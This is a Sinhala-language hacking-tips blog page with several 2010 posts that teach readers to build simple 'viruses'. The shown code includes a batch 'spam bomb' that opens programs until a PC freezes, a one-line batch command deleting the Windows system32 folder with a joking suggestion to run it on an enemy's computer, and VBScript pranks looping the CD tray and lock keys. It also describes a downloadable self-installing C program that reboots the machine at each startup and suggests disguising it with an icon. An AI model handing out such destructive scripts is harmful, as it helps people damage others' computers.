හතර වරං හැකිං

සිංහලෙන් Tips Tricks & Hacks කියල මුලින් ආපු අපි ඔන්න අලුත් මුහුනුවරකින්..

අපේ ආරක්ෂාව

මොනව කරන්නත් කලින් අපි ආරක්ෂා වෙලා ඉන්න එපැයි.

මොකක්ද මේ Ethical Hacking

Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks

පරිඝණක වෛරස්

Types of Computer Viruses, Infection Strategies, Antivirus Defense Development.

පොඩි පොඩි software කෑලි

අපිට හදිස්සියට වගෙම නිතර නිතර ඕනෙ වෙන software කෑලි නොමිලේම ගන්න.

The Technical Avenue

මේක තමයි අපේ ඉංගිරීසි අඩවිය. ගිහින්ම බලන්න.

Pages

හොඳ හෝ නරක comment එකක් දාල යන්න අමතක කරන්න එපා.. :)
Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Thursday, June 3, 2010

පුංචි පහේ spam බෝම්බයක් හදාගන්න ඕනෙද..?


ඔන්න ආයෙත් notepad එකක් ගන්න.
පහලින් තියෙන code එක ඒකෙ type කරගන්න;









@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer


ඔය code එකේ start කියල තියෙන ඒව ඕනෙ තරම් copy paste කරගන්න. ඒව වැඩි වෙන තරමට තමයි හොඳ..

උදා:

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

දැන් Save as ගිහින් ඕක කැමති නමකින් හැබැයි අන්තිමට .bat කියල(අපි හදාගන්නෙ batch command file එකක් නිසා) rename කරල save කරන්න.

එච්චරයි.. දැන් අපේ පුන්චි apam bomb එක ලෑස්තියි.

මේකෙදි වෙන්නෙ මේකයි. කවුරු හරි ඔය batch file එක run කරපු ගමන් අපි code එකේ start කියල ලියල තියෙන හැම එකක්ම open වෙන්න ගන්නව.
උදා: start iexplore.exe වලින් වෙන්නෙ internet explorer එක open වෙන එක.
ඉතින් හිතන්න මේ code එක සිය පාරක් නැත්නම් ඊට වැඩි උපරිම ප්‍රමාණයක් copy paste කලොත් computer එක stuck වෙන්න උනත් පුලුවන්.

ඔයාට මේක වැඩ කරනවද බලන්න ඕනෙනම් code එක වැඩි ප්‍රමාණයක් copy paste කරන්නෙ නැතුව run කරල බලන්න. ඕක run කලාට හානියක් නෑ.

ඕක ඉතින් පොඩි පහේ ආතල් එකක් ගන්න මිසක් කිසි හානියක් කරන්නෙ නෑ.. වැඩිම වුනොත් මන් කලින් කියපු විදිහට statrt command වැඩි කලොත් computer එක stuck කරන්න පුලුවන් වෙයි..

Saturday, May 29, 2010

ඔන්න තවත් virus එකක් හදන හැටි..



අද මං පෙන්නන්න යන virus program එකෙන් වෙන්නෙ ඔයා computer එක on කරන හැම වෙලාවකම desktop එක boot වෙද්දිම virus program එකෙන් computer එක restart කරන එක.

මේකෙ coding part එක කරල තියෙන්නෙ "C" language එක use කරල. C ගැන අවබෝදයක් තියෙන කෙනෙකුට ලේසියෙන්ම මේක තේරුම් ගන්න පුලුවන්..


මෙන්න මේකයි code එක:


source code එක මෙතනින් download කරගන්න: DOWNLOAD
Download වෙන file එක SystRe.C කියල ඇති.
දැන් ඒ source code එක compile කරගන්න.

දැන් වැඩේ නම් හරි.. දැන් ඔය compiled file එක, ඒ කියන්නෙ SystRe.exe file එක double click කලොත් දිගටම ඔයාගෙ computer එක මන් කලින් කියපු විදිහට on වෙද්දි restart වෙනව.

දැන් මන් මේකට පිලියමකුත් දෙන්නම්:
1. Computer එක safe mood එකෙන් reboot කරන්න.
2. දැන් C:\Windows\System වලට යන්න.
3. ඒකෙ තියෙන SystRe.exe file එක delete කරන්න.
4. දැන් run එකේ regedit කියල type කරල registry editor එක ගන්න.
දැන් මේ පියවර වලට අනුව යන්න:
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

දැන් දකුණු අත පැත්තෙ ඇති "sres" කියල entry එකක්.
ඒ entry එක delete කරල දාන්න.

දැන් virus එක සාර්ථකව අයින් වෙලා ඇති..

මේකෙදි වෙන්නෙ මොකක්ද????

1. මුලින්ම virus එක විසින් computer එකේ root partition එක හොයාගන්නව.
(windows install කරල තියෙන partition එක)
2. ඊලගට check කරල බලනව virus එක දැනටමත් computer එකේ තියෙනවද කියල.
3. එහෙම නැත්නම් virus එක computer එකට copy කරනව. ඒ එක්කම virus file එක startup එකට දාන්න registry entry එකක් හදනව..
4. එහෙම නැත්නම් virus එක දැනටමත් computer එකේ තියෙනව නම් command එක දෙනව computer එක restart වෙන්න.

සටහන: වඩා හොඳයි icon changer software එකක් භවිතා කරල ඔයාට පුලුවන්නම් .exe file එකට හොඳ icon එකක් දාගන්න. ඔයාට මෙතනින්(http://www.shelllabs.com/) ඒකට ඕන කරන software එක download කරගන්න පුලුවන්..

Wednesday, May 26, 2010

පොඩි ඒත් ටිකක් විතර භයානක virus එකක් හදමුද..??


මේක පොඩි සරල code එකක්.
****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****


1. Notepad එකක් අරන් පහල code එක copy paste කරන්න.

@echo off del c:\windows\system32

2. ඒක කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල එන්න ඕනෙ.
Eg: virus.bat


****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****
මේකෙන් System32 file එක delete කරනව. Windows crash වෙනව..
වැඩ කරනවද බලන්නම ඕනෙ නම් තරහකාරයෙක්ගෙ PC එකක run කරල බලන්න.. (එහෙම කරන්ඩත් එපා.. පව්නෙ...)

Saturday, April 17, 2010

Fun virus 2ක් හදමු..

1. Notepad එකක් open කරගන්න.
2. පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:









Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


3. දැන් ඔය Notepad එක save as ගිහින් disco.vbs කියල save කරන්න.
(කැමති නමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..
කොහොමඩ වැඩ..

* CD Rom එක Auto open වෙන එක නවත්තන්න TASK MANAGER එක open කරල(ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.

[02]. Key board එක පිස්සු නටන virus එකක් හදමු.. ;)

ඉස්සෙල්ල එක වගේමයි..

1. Notepad එකක් open කරගන්න.2. පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


3. දැන් ඔය Notepad එක save as ගිහින් disco2.vbs කියල save කරන්න.
(කැමති නමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..

දැන් keyboard එක පිස්සු නටන හැටි බලන්න වෙන notepad එකක් අරන් මොනව හරි type කරල බලන්න..

ඕක නවත්තන්නෙත් ඉස්සෙල්ල විදිහටමයි..